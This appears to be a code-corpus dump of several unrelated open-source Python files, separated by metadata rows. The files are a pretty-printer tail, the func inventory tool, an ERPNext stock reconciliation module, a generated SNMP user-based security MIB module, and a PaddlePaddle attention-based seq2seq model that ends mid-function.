if cycle:
p.text('...')
elif len(obj):
p.pretty(dict(obj))
for_type_by_name('collections', 'defaultdict', _defaultdict_pprint)
for_type_by_name('collections', 'OrderedDict', _ordereddict_pprint)
for_type_by_name('collections', 'deque', _deque_pprint)
for_type_by_name('collections', 'Counter', _counter_pprint)
if __name__ == '__main__':
from random import randrange
class Foo(object):
def __init__(self):
self.foo = 1
self.bar = re.compile(r'\s+')
self.blub = dict.fromkeys(range(30), randrange(1, 40))
self.hehe = 23424.234234
self.list = ["blub", "blah", self]
def get_foo(self):
print("foo")
pprint(Foo(), verbose=True)
|
gpl-3.0
| 1,760,497,032,878,910,500 | 31.337223 | 95 | 0.567062 | false | 3.978894 | false | false | false |
pombredanne/func
|
func/overlord/inventory.py
|
1
|
6796
|
##
## func inventory app.
## use func to collect inventory data on anything, yes, anything
##
## Copyright 2007, Red Hat, Inc
## Michael DeHaan <[email protected]>
## +AUTHORS
##
## This software may be freely redistributed under the terms of the GNU
## general public license.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
##
import os.path
import time
import optparse
import sys
import pprint
import xmlrpclib
from func.minion import sub_process
import func.overlord.client as func_client
import func.utils as utils
DEFAULT_TREE = "/var/lib/func/inventory/"
class FuncInventory(object):
def __init__(self):
pass
def run(self,args):
p = optparse.OptionParser()
p.add_option("-v", "--verbose",
dest="verbose",
action="store_true",
help="provide extra output")
p.add_option("-s", "--server-spec",
dest="server_spec",
default="*",
help="run against specific servers, default: '*'")
p.add_option("-m", "--methods",
dest="methods",
default="inventory",
help="run inventory only on certain function names, default: 'inventory'")
p.add_option("-M", "--modules",
dest="modules",
default="all",
help="run inventory only on certain module names, default: 'all'")
p.add_option("-t", "--tree",
dest="tree",
default=DEFAULT_TREE,
help="output results tree here, default: %s" % DEFAULT_TREE)
p.add_option("-n", "--no-git",
dest="nogit",
action="store_true",
help="disable useful change tracking features")
p.add_option("-x", "--xmlrpc", dest="xmlrpc",
help="output data using XMLRPC format",
action="store_true")
p.add_option("-j", "--json", dest="json",
help="output data using JSON",
action="store_true")
(options, args) = p.parse_args(args)
self.options = options
filtered_module_list = options.modules.split(",")
filtered_function_list = options.methods.split(",")
self.git_setup(options)
# see what modules each host provides (as well as what hosts we have)
host_methods = func_client.Overlord(options.server_spec).system.list_methods()
# call all remote info methods and handle them
if options.verbose:
print "- scanning ..."
# for (host, modules) in host_modules.iteritems():
for (host, methods) in host_methods.iteritems():
if utils.is_error(methods):
print "-- connection refused: %s" % host
break
for each_method in methods:
#if type(each_method) == int:
# if self.options.verbose:
# print "-- connection refused: %s" % host
# break
tokens = each_method.split(".")
module_name = ".".join(tokens[:-1])
method_name = tokens[-1]
if not "all" in filtered_module_list and not module_name in filtered_module_list:
continue
if not "all" in filtered_function_list and not method_name in filtered_function_list:
continue
overlord = func_client.Overlord(host,noglobs=True) # ,noglobs=True)
results = getattr(getattr(overlord,module_name),method_name)()
if self.options.verbose:
print "-- %s: running: %s %s" % (host, module_name, method_name)
self.save_results(options, host, module_name, method_name, results)
self.git_update(options)
return 1
def format_return(self, data):
"""
The call module supports multiple output return types, the default is pprint.
"""
# special case... if the return is a string, just print it straight
if type(data) == str:
return data
if self.options.xmlrpc:
return xmlrpclib.dumps((data,""))
if self.options.json:
try:
import simplejson
return simplejson.dumps(data)
except ImportError:
print "ERROR: json support not found, install python-simplejson"
sys.exit(1)
return pprint.pformat(data)
# FUTURE: skvidal points out that guest symlinking would be an interesting feature
def save_results(self, options, host_name, module_name, method_name, results):
dirname = os.path.join(options.tree, host_name, module_name)
if not os.path.exists(dirname):
os.makedirs(dirname)
filename = os.path.join(dirname, method_name)
results_file = open(filename,"w+")
data = self.format_return(results)
results_file.write(data)
results_file.close()
def git_setup(self,options):
if options.nogit:
return
if not os.path.exists("/usr/bin/git"):
print "git-core is not installed, so no change tracking is available."
print "use --no-git or, better, just install it."
sys.exit(411)
if not os.path.exists(options.tree):
os.makedirs(options.tree)
dirname = os.path.join(options.tree, ".git")
if not os.path.exists(dirname):
if options.verbose:
print "- initializing git repo: %s" % options.tree
cwd = os.getcwd()
os.chdir(options.tree)
rc1 = sub_process.call(["/usr/bin/git", "init"], shell=False)
# FIXME: check rc's
os.chdir(cwd)
else:
if options.verbose:
print "- git already initialized: %s" % options.tree
def git_update(self,options):
if options.nogit:
return
else:
if options.verbose:
print "- updating git"
mytime = time.asctime()
cwd = os.getcwd()
os.chdir(options.tree)
rc1 = sub_process.call(["/usr/bin/git", "add", "*" ], shell=False)
rc2 = sub_process.call(["/usr/bin/git", "commit", "-a", "-m", "Func-inventory update: %s" % mytime], shell=False)
# FIXME: check rc's
os.chdir(cwd)
if __name__ == "__main__":
inv = FuncInventory()
inv.run(sys.argv)
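# Example invocations (illustrative; option names as defined in run() above,
# module/method names are only examples):
#   python inventory.py --server-spec "web*" --methods inventory --tree /tmp/inventory
#   python inventory.py --modules hardware,service --no-git --verbose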
|
gpl-2.0
| 2,945,001,256,754,425,000 | 34.581152 | 121 | 0.543996 | false | 4.282294 | false | false | false |
gangadharkadam/office_erp
|
erpnext/stock/doctype/stock_reconciliation/stock_reconciliation.py
|
1
|
11155
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.defaults
import json
from frappe import msgprint, _
from frappe.utils import cstr, flt, cint
from erpnext.stock.stock_ledger import update_entries_after
from erpnext.controllers.stock_controller import StockController
class StockReconciliation(StockController):
def __init__(self, arg1, arg2=None):
super(StockReconciliation, self).__init__(arg1, arg2)
self.head_row = ["Item Code", "Warehouse", "Quantity", "Valuation Rate"]
def validate(self):
self.entries = []
self.validate_data()
self.validate_expense_account()
def on_submit(self):
self.insert_stock_ledger_entries()
self.make_gl_entries()
def on_cancel(self):
self.delete_and_repost_sle()
self.make_cancel_gl_entries()
def validate_data(self):
if not self.reconciliation_json:
return
data = json.loads(self.reconciliation_json)
# strip out extra columns (if any)
data = [row[:4] for row in data]
if self.head_row not in data:
msgprint(_("""Wrong Template: Unable to find head row."""),
raise_exception=1)
# remove the help part and save the json
head_row_no = 0
if data.index(self.head_row) != 0:
head_row_no = data.index(self.head_row)
data = data[head_row_no:]
self.reconciliation_json = json.dumps(data)
def _get_msg(row_num, msg):
return _("Row # {0}: ").format(row_num+head_row_no+2) + msg
self.validation_messages = []
item_warehouse_combinations = []
# validate no of rows
rows = data[1:]
if len(rows) > 100:
msgprint(_("""Sorry! We can only allow upto 100 rows for Stock Reconciliation."""),
raise_exception=True)
for row_num, row in enumerate(rows):
# find duplicates
if [row[0], row[1]] in item_warehouse_combinations:
self.validation_messages.append(_get_msg(row_num, _("Duplicate entry")))
else:
item_warehouse_combinations.append([row[0], row[1]])
self.validate_item(row[0], row_num+head_row_no+2)
# validate warehouse
if not frappe.db.get_value("Warehouse", row[1]):
self.validation_messages.append(_get_msg(row_num, _("Warehouse not found in the system")))
# if both not specified
if row[2] == "" and row[3] == "":
self.validation_messages.append(_get_msg(row_num,
_("Please specify either Quantity or Valuation Rate or both")))
# do not allow negative quantity
if flt(row[2]) < 0:
self.validation_messages.append(_get_msg(row_num,
_("Negative Quantity is not allowed")))
# do not allow negative valuation
if flt(row[3]) < 0:
self.validation_messages.append(_get_msg(row_num,
_("Negative Valuation Rate is not allowed")))
# throw all validation messages
if self.validation_messages:
for msg in self.validation_messages:
msgprint(msg)
raise frappe.ValidationError
def validate_item(self, item_code, row_num):
from erpnext.stock.doctype.item.item import validate_end_of_life, \
validate_is_stock_item, validate_cancelled_item
# using try except to catch all validation msgs and display together
try:
item = frappe.get_doc("Item", item_code)
if not item:
raise frappe.ValidationError, (_("Item: {0} not found in the system").format(item_code))
# end of life and stock item
validate_end_of_life(item_code, item.end_of_life, verbose=0)
validate_is_stock_item(item_code, item.is_stock_item, verbose=0)
# item should not be serialized
if item.has_serial_no == "Yes":
raise frappe.ValidationError, _("Serialized Item {0} cannot be updated \
using Stock Reconciliation").format(item_code)
# item managed batch-wise not allowed
if item.has_batch_no == "Yes":
raise frappe.ValidationError, _("Item: {0} managed batch-wise, can not be reconciled using \
Stock Reconciliation, instead use Stock Entry").format(item_code)
# docstatus should be < 2
validate_cancelled_item(item_code, item.docstatus, verbose=0)
except Exception, e:
self.validation_messages.append(_("Row # ") + ("%d: " % (row_num)) + cstr(e))
def insert_stock_ledger_entries(self):
""" find difference between current and expected entries
and create stock ledger entries based on the difference"""
from erpnext.stock.utils import get_valuation_method
from erpnext.stock.stock_ledger import get_previous_sle
row_template = ["item_code", "warehouse", "qty", "valuation_rate"]
if not self.reconciliation_json:
msgprint(_("""Stock Reconciliation file not uploaded"""), raise_exception=1)
data = json.loads(self.reconciliation_json)
for row_num, row in enumerate(data[data.index(self.head_row)+1:]):
row = frappe._dict(zip(row_template, row))
row["row_num"] = row_num
previous_sle = get_previous_sle({
"item_code": row.item_code,
"warehouse": row.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time
})
# check valuation rate mandatory
if row.qty != "" and not row.valuation_rate and \
flt(previous_sle.get("qty_after_transaction")) <= 0:
frappe.throw(_("Valuation Rate required for Item {0}").format(row.item_code))
change_in_qty = row.qty != "" and \
(flt(row.qty) - flt(previous_sle.get("qty_after_transaction")))
change_in_rate = row.valuation_rate != "" and \
(flt(row.valuation_rate) - flt(previous_sle.get("valuation_rate")))
if get_valuation_method(row.item_code) == "Moving Average":
self.sle_for_moving_avg(row, previous_sle, change_in_qty, change_in_rate)
else:
self.sle_for_fifo(row, previous_sle, change_in_qty, change_in_rate)
def sle_for_moving_avg(self, row, previous_sle, change_in_qty, change_in_rate):
"""Insert Stock Ledger Entries for Moving Average valuation"""
def _get_incoming_rate(qty, valuation_rate, previous_qty, previous_valuation_rate):
if previous_valuation_rate == 0:
return flt(valuation_rate)
else:
if valuation_rate == "":
valuation_rate = previous_valuation_rate
return (qty * valuation_rate - previous_qty * previous_valuation_rate) \
/ flt(qty - previous_qty)
if change_in_qty:
# if change in qty, irrespective of change in rate
incoming_rate = _get_incoming_rate(flt(row.qty), flt(row.valuation_rate),
flt(previous_sle.get("qty_after_transaction")),
flt(previous_sle.get("valuation_rate")))
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Actual Entry"
self.insert_entries({"actual_qty": change_in_qty, "incoming_rate": incoming_rate}, row)
elif change_in_rate and flt(previous_sle.get("qty_after_transaction")) > 0:
# if no change in qty, but change in rate
# and positive actual stock before this reconciliation
incoming_rate = _get_incoming_rate(
flt(previous_sle.get("qty_after_transaction"))+1, flt(row.valuation_rate),
flt(previous_sle.get("qty_after_transaction")),
flt(previous_sle.get("valuation_rate")))
# +1 entry
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Valuation Adjustment +1"
self.insert_entries({"actual_qty": 1, "incoming_rate": incoming_rate}, row)
# -1 entry
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Valuation Adjustment -1"
self.insert_entries({"actual_qty": -1}, row)
def sle_for_fifo(self, row, previous_sle, change_in_qty, change_in_rate):
"""Insert Stock Ledger Entries for FIFO valuation"""
previous_stock_queue = json.loads(previous_sle.get("stock_queue") or "[]")
previous_stock_qty = sum((batch[0] for batch in previous_stock_queue))
previous_stock_value = sum((batch[0] * batch[1] for batch in \
previous_stock_queue))
def _insert_entries():
if previous_stock_queue != [[row.qty, row.valuation_rate]]:
# make entry as per attachment
if row.qty:
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Actual Entry"
self.insert_entries({"actual_qty": row.qty,
"incoming_rate": flt(row.valuation_rate)}, row)
# Make reverse entry
if previous_stock_qty:
row["voucher_detail_no"] = "Row: " + cstr(row.row_num) + "/Reverse Entry"
self.insert_entries({"actual_qty": -1 * previous_stock_qty,
"incoming_rate": previous_stock_qty < 0 and
flt(row.valuation_rate) or 0}, row)
if change_in_qty:
if row.valuation_rate == "":
# dont want change in valuation
if previous_stock_qty > 0:
# set valuation_rate as previous valuation_rate
row.valuation_rate = previous_stock_value / flt(previous_stock_qty)
_insert_entries()
elif change_in_rate and previous_stock_qty > 0:
# if no change in qty, but change in rate
# and positive actual stock before this reconciliation
row.qty = previous_stock_qty
_insert_entries()
def insert_entries(self, opts, row):
"""Insert Stock Ledger Entries"""
args = frappe._dict({
"doctype": "Stock Ledger Entry",
"item_code": row.item_code,
"warehouse": row.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time,
"voucher_type": self.doctype,
"voucher_no": self.name,
"company": self.company,
"stock_uom": frappe.db.get_value("Item", row.item_code, "stock_uom"),
"voucher_detail_no": row.voucher_detail_no,
"fiscal_year": self.fiscal_year,
"is_cancelled": "No"
})
args.update(opts)
self.make_sl_entries([args])
# append to entries
self.entries.append(args)
def delete_and_repost_sle(self):
""" Delete Stock Ledger Entries related to this voucher
and repost future Stock Ledger Entries"""
existing_entries = frappe.db.sql("""select distinct item_code, warehouse
from `tabStock Ledger Entry` where voucher_type=%s and voucher_no=%s""",
(self.doctype, self.name), as_dict=1)
# delete entries
frappe.db.sql("""delete from `tabStock Ledger Entry`
where voucher_type=%s and voucher_no=%s""", (self.doctype, self.name))
# repost future entries for selected item_code, warehouse
for entries in existing_entries:
update_entries_after({
"item_code": entries.item_code,
"warehouse": entries.warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time
})
def get_gl_entries(self, warehouse_account=None):
if not self.cost_center:
msgprint(_("Please enter Cost Center"), raise_exception=1)
return super(StockReconciliation, self).get_gl_entries(warehouse_account,
self.expense_account, self.cost_center)
def validate_expense_account(self):
if not cint(frappe.defaults.get_global_default("auto_accounting_for_stock")):
return
if not self.expense_account:
msgprint(_("Please enter Expense Account"), raise_exception=1)
elif not frappe.db.sql("""select * from `tabStock Ledger Entry`"""):
if frappe.db.get_value("Account", self.expense_account, "report_type") == "Profit and Loss":
frappe.throw(_("Difference Account must be a 'Liability' type account, since this Stock Reconciliation is an Opening Entry"))
@frappe.whitelist()
def upload():
from frappe.utils.datautils import read_csv_content_from_uploaded_file
csv_content = read_csv_content_from_uploaded_file()
return filter(lambda x: x and any(x), csv_content)
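# Illustrative attachment layout expected by validate_data (item codes, warehouse
# and figures are made up); any rows above the head row are treated as help text:
#
#   Item Code | Warehouse    | Quantity | Valuation Rate
#   ITEM-001  | Stores - XYZ | 10       | 150.0
#   ITEM-002  | Stores - XYZ |          | 75.0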
|
agpl-3.0
| -2,882,474,033,307,407,400 | 35.335505 | 129 | 0.688839 | false | 3.169935 | false | false | false |
kdart/pycopia
|
mibs/pycopia/mibs/SNMP_USER_BASED_SM_MIB.py
|
1
|
8334
|
# python
# This file is generated by a program (mib2py). Any edits will be lost.
from pycopia.aid import Enum
import pycopia.SMI.Basetypes
Range = pycopia.SMI.Basetypes.Range
Ranges = pycopia.SMI.Basetypes.Ranges
from pycopia.SMI.Objects import ColumnObject, MacroObject, NotificationObject, RowObject, ScalarObject, NodeObject, ModuleObject, GroupObject
# imports
from SNMPv2_SMI import MODULE_IDENTITY, OBJECT_TYPE, OBJECT_IDENTITY, snmpModules, Counter32
from SNMPv2_CONF import MODULE_COMPLIANCE, OBJECT_GROUP
from SNMPv2_TC import TEXTUAL_CONVENTION, TestAndIncr, RowStatus, RowPointer, StorageType, AutonomousType
from SNMP_FRAMEWORK_MIB import SnmpAdminString, SnmpEngineID, snmpAuthProtocols, snmpPrivProtocols
class SNMP_USER_BASED_SM_MIB(ModuleObject):
path = '/usr/share/mibs/ietf/SNMP-USER-BASED-SM-MIB'
conformance = 5
name = 'SNMP-USER-BASED-SM-MIB'
language = 2
description = 'The management information definitions for the\nSNMP User-based Security Model.\n\nCopyright (C) The Internet Society (2002). This\nversion of this MIB module is part of RFC 3414;\nsee the RFC itself for full legal notices.'
# nodes
class usmNoAuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 1])
name = 'usmNoAuthProtocol'
class usmHMACMD5AuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 2])
name = 'usmHMACMD5AuthProtocol'
class usmHMACSHAAuthProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 1, 3])
name = 'usmHMACSHAAuthProtocol'
class usmNoPrivProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 2, 1])
name = 'usmNoPrivProtocol'
class usmDESPrivProtocol(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 10, 1, 2, 2])
name = 'usmDESPrivProtocol'
class snmpUsmMIB(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15])
name = 'snmpUsmMIB'
class usmMIBObjects(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1])
name = 'usmMIBObjects'
class usmStats(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1])
name = 'usmStats'
class usmUser(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2])
name = 'usmUser'
class usmMIBConformance(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2])
name = 'usmMIBConformance'
class usmMIBCompliances(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 1])
name = 'usmMIBCompliances'
class usmMIBGroups(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 2])
name = 'usmMIBGroups'
# macros
# types
class KeyChange(pycopia.SMI.Basetypes.OctetString):
status = 1
# scalars
class usmStatsUnsupportedSecLevels(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 1])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsNotInTimeWindows(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 2])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsUnknownUserNames(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 3])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsUnknownEngineIDs(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 4])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsWrongDigests(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 5])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmStatsDecryptionErrors(ScalarObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 1, 6])
syntaxobject = pycopia.SMI.Basetypes.Counter32
class usmUserSpinLock(ScalarObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 1])
syntaxobject = pycopia.SMI.Basetypes.TestAndIncr
# columns
class usmUserEngineID(ColumnObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 1])
syntaxobject = SnmpEngineID
class usmUserName(ColumnObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 2])
syntaxobject = SnmpAdminString
class usmUserSecurityName(ColumnObject):
access = 4
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 3])
syntaxobject = SnmpAdminString
class usmUserCloneFrom(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 4])
syntaxobject = pycopia.SMI.Basetypes.RowPointer
class usmUserAuthProtocol(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 5])
syntaxobject = pycopia.SMI.Basetypes.AutonomousType
class usmUserAuthKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 6])
syntaxobject = KeyChange
class usmUserOwnAuthKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 7])
syntaxobject = KeyChange
class usmUserPrivProtocol(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 8])
syntaxobject = pycopia.SMI.Basetypes.AutonomousType
class usmUserPrivKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 9])
syntaxobject = KeyChange
class usmUserOwnPrivKeyChange(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 10])
syntaxobject = KeyChange
class usmUserPublic(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 11])
syntaxobject = pycopia.SMI.Basetypes.OctetString
class usmUserStorageType(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 12])
syntaxobject = pycopia.SMI.Basetypes.StorageType
class usmUserStatus(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1, 13])
syntaxobject = pycopia.SMI.Basetypes.RowStatus
# rows
class usmUserEntry(RowObject):
status = 1
index = pycopia.SMI.Objects.IndexObjects([usmUserEngineID, usmUserName], False)
create = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 1, 2, 2, 1])
access = 2
rowstatus = usmUserStatus
columns = {'usmUserEngineID': usmUserEngineID, 'usmUserName': usmUserName, 'usmUserSecurityName': usmUserSecurityName, 'usmUserCloneFrom': usmUserCloneFrom, 'usmUserAuthProtocol': usmUserAuthProtocol, 'usmUserAuthKeyChange': usmUserAuthKeyChange, 'usmUserOwnAuthKeyChange': usmUserOwnAuthKeyChange, 'usmUserPrivProtocol': usmUserPrivProtocol, 'usmUserPrivKeyChange': usmUserPrivKeyChange, 'usmUserOwnPrivKeyChange': usmUserOwnPrivKeyChange, 'usmUserPublic': usmUserPublic, 'usmUserStorageType': usmUserStorageType, 'usmUserStatus': usmUserStatus}
# notifications (traps)
# groups
class usmMIBBasicGroup(GroupObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 6, 3, 15, 2, 2, 1])
group = [usmStatsUnsupportedSecLevels, usmStatsNotInTimeWindows, usmStatsUnknownUserNames, usmStatsUnknownEngineIDs, usmStatsWrongDigests, usmStatsDecryptionErrors, usmUserSpinLock, usmUserSecurityName, usmUserCloneFrom, usmUserAuthProtocol, usmUserAuthKeyChange, usmUserOwnAuthKeyChange, usmUserPrivProtocol, usmUserPrivKeyChange, usmUserOwnPrivKeyChange, usmUserPublic, usmUserStorageType, usmUserStatus]
# capabilities
# special additions
# Add to master OIDMAP.
from pycopia import SMI
SMI.update_oidmap(__name__)
|
apache-2.0
| -6,750,926,250,645,303,000 | 31.940711 | 547 | 0.735781 | false | 2.616641 | false | false | false |
kuke/models
|
fluid/PaddleNLP/neural_machine_translation/rnn_search/attention_model.py
|
1
|
8831
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle.fluid as fluid
from paddle.fluid.contrib.decoder.beam_search_decoder import *
def lstm_step(x_t, hidden_t_prev, cell_t_prev, size):
def linear(inputs):
return fluid.layers.fc(input=inputs, size=size, bias_attr=True)
forget_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
input_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
output_gate = fluid.layers.sigmoid(x=linear([hidden_t_prev, x_t]))
cell_tilde = fluid.layers.tanh(x=linear([hidden_t_prev, x_t]))
cell_t = fluid.layers.sums(input=[
fluid.layers.elementwise_mul(
x=forget_gate, y=cell_t_prev), fluid.layers.elementwise_mul(
x=input_gate, y=cell_tilde)
])
hidden_t = fluid.layers.elementwise_mul(
x=output_gate, y=fluid.layers.tanh(x=cell_t))
return hidden_t, cell_t
def seq_to_seq_net(embedding_dim, encoder_size, decoder_size, source_dict_dim,
target_dict_dim, is_generating, beam_size, max_length):
"""Construct a seq2seq network."""
def bi_lstm_encoder(input_seq, gate_size):
# A bi-directional lstm encoder implementation.
        # The linear transformation part for the input gate, output gate, forget
        # gate and cell activation vectors needs to be done outside of dynamic_lstm,
        # so the output size is 4 times gate_size.
input_forward_proj = fluid.layers.fc(input=input_seq,
size=gate_size * 4,
act='tanh',
bias_attr=False)
forward, _ = fluid.layers.dynamic_lstm(
input=input_forward_proj, size=gate_size * 4, use_peepholes=False)
input_reversed_proj = fluid.layers.fc(input=input_seq,
size=gate_size * 4,
act='tanh',
bias_attr=False)
reversed, _ = fluid.layers.dynamic_lstm(
input=input_reversed_proj,
size=gate_size * 4,
is_reverse=True,
use_peepholes=False)
return forward, reversed
# The encoding process. Encodes the input words into tensors.
src_word_idx = fluid.layers.data(
name='source_sequence', shape=[1], dtype='int64', lod_level=1)
src_embedding = fluid.layers.embedding(
input=src_word_idx,
size=[source_dict_dim, embedding_dim],
dtype='float32')
src_forward, src_reversed = bi_lstm_encoder(
input_seq=src_embedding, gate_size=encoder_size)
encoded_vector = fluid.layers.concat(
input=[src_forward, src_reversed], axis=1)
encoded_proj = fluid.layers.fc(input=encoded_vector,
size=decoder_size,
bias_attr=False)
backward_first = fluid.layers.sequence_pool(
input=src_reversed, pool_type='first')
decoder_boot = fluid.layers.fc(input=backward_first,
size=decoder_size,
bias_attr=False,
act='tanh')
cell_init = fluid.layers.fill_constant_batch_size_like(
input=decoder_boot,
value=0.0,
shape=[-1, decoder_size],
dtype='float32')
cell_init.stop_gradient = False
    # Create an RNN state cell by providing the input and hidden states, and
    # specify the hidden state as output.
h = InitState(init=decoder_boot, need_reorder=True)
c = InitState(init=cell_init)
state_cell = StateCell(
inputs={'x': None,
'encoder_vec': None,
'encoder_proj': None},
states={'h': h,
'c': c},
out_state='h')
def simple_attention(encoder_vec, encoder_proj, decoder_state):
        # The implementation of a simple attention model
decoder_state_proj = fluid.layers.fc(input=decoder_state,
size=decoder_size,
bias_attr=False)
decoder_state_expand = fluid.layers.sequence_expand(
x=decoder_state_proj, y=encoder_proj)
        # concatenated lod should inherit from encoder_proj
mixed_state = encoder_proj + decoder_state_expand
attention_weights = fluid.layers.fc(input=mixed_state,
size=1,
bias_attr=False)
attention_weights = fluid.layers.sequence_softmax(
input=attention_weights)
        weights_reshape = fluid.layers.reshape(x=attention_weights, shape=[-1])
        scaled = fluid.layers.elementwise_mul(
            x=encoder_vec, y=weights_reshape, axis=0)
context = fluid.layers.sequence_pool(input=scaled, pool_type='sum')
return context
@state_cell.state_updater
def state_updater(state_cell):
# Define the updater of RNN state cell
current_word = state_cell.get_input('x')
encoder_vec = state_cell.get_input('encoder_vec')
encoder_proj = state_cell.get_input('encoder_proj')
prev_h = state_cell.get_state('h')
prev_c = state_cell.get_state('c')
context = simple_attention(encoder_vec, encoder_proj, prev_h)
decoder_inputs = fluid.layers.concat(
input=[context, current_word], axis=1)
h, c = lstm_step(decoder_inputs, prev_h, prev_c, decoder_size)
state_cell.set_state('h', h)
state_cell.set_state('c', c)
# Define the decoding process
if not is_generating:
# Training process
trg_word_idx = fluid.layers.data(
name='target_sequence', shape=[1], dtype='int64', lod_level=1)
trg_embedding = fluid.layers.embedding(
input=trg_word_idx,
size=[target_dict_dim, embedding_dim],
dtype='float32')
# A decoder for training
decoder = TrainingDecoder(state_cell)
with decoder.block():
current_word = decoder.step_input(trg_embedding)
encoder_vec = decoder.static_input(encoded_vector)
encoder_proj = decoder.static_input(encoded_proj)
decoder.state_cell.compute_state(inputs={
'x': current_word,
'encoder_vec': encoder_vec,
'encoder_proj': encoder_proj
})
h = decoder.state_cell.get_state('h')
